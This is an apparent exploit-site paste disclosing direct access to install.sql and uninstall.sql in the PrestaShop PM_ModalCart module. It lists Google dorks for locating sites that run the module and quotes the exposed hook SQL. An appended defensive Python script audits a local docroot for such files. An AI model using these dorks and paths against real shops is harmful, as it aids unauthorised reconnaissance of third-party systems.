KingSkrupellos

PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure

Dec 23rd, 2018
#################################################################################################

# Exploit Title : PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
+ prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
# Software Price : 40$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_modalcart/''
intext:''©2018 Recettes & Cabas | Tous droits réservés''
intext:''Agence de communication - Une réalisation Communikey''
intext:''cron module by samdha.net''
intext:''© 2018 - Udviklet og Hosted af Netgiganten.dk''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Exploit :

/modules/pm_modalcart/install.sql

/modules/pm_modalcart/uninstall.sql

#################################################################################################

# Example SQL Database Information Exposure =>

install.sql =>

INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCAbove',
'Modalcart above', 'On modal, above the product added to cart', 1);
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCBelow',
'Modalcart below', 'On modal, below the product added to cart', 1);

uninstall.sql =>

DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';

#################################################################################################

# Example Vulnerable Sites =>

#################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
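For shop operators checking their own installation: the following is an added example, not part of the original paste or of the module. It walks a local PrestaShop document root and lists every `.sql` file left under `modules/`, separating installer templates like the `install.sql` quoted above from files that may hold real table data. The function names, the `examplemodule/backup.sql` sample and the rule "every table uses the literal `PREFIX_` placeholder means template" are assumptions made for this example.

```python
import os
import re
import tempfile

# Heuristic (assumption): installer templates reference tables only through the
# literal PREFIX_ placeholder, as in the install.sql quoted above. A .sql file
# naming tables without that placeholder is more likely a real dump.
TABLE_REF = re.compile(r"(?:INTO|FROM|TABLE(?:\s+IF\s+(?:NOT\s+)?EXISTS)?)\s+`?([A-Za-z0-9_]+)`?", re.I)

def audit_module_sql(docroot):
    """Return [(path relative to docroot, verdict)] for every .sql under modules/."""
    findings = []
    for dirpath, _dirs, files in os.walk(os.path.join(docroot, "modules")):
        for name in files:
            if not name.lower().endswith(".sql"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                tables = TABLE_REF.findall(fh.read())
            if not tables:
                verdict = "no-table-references"
            elif all(t.startswith("PREFIX_") for t in tables):
                verdict = "installer-template"
            else:
                verdict = "possible-live-data"
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            findings.append((rel, verdict))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample docroot: one template as quoted on the page, one dump."""
    mod = os.path.join(root, "modules", "pm_modalcart")
    os.makedirs(mod)
    with open(os.path.join(mod, "install.sql"), "w") as fh:
        fh.write("INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) "
                 "VALUES ('MCAbove', 'Modalcart above', 'On modal, above the product added to cart', 1);\n")
    other = os.path.join(root, "modules", "examplemodule")  # hypothetical module
    os.makedirs(other)
    with open(os.path.join(other, "backup.sql"), "w") as fh:
        fh.write("INSERT INTO `ps_customer` (`email`) VALUES ('user@example.invalid');\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, verdict in audit_module_sql(tmp):
            print(f"{verdict:20} /{rel}")
```

None of the listed files needs to be served over HTTP; removing them after installation or denying `*.sql` under `/modules/` at the web server closes the exposure.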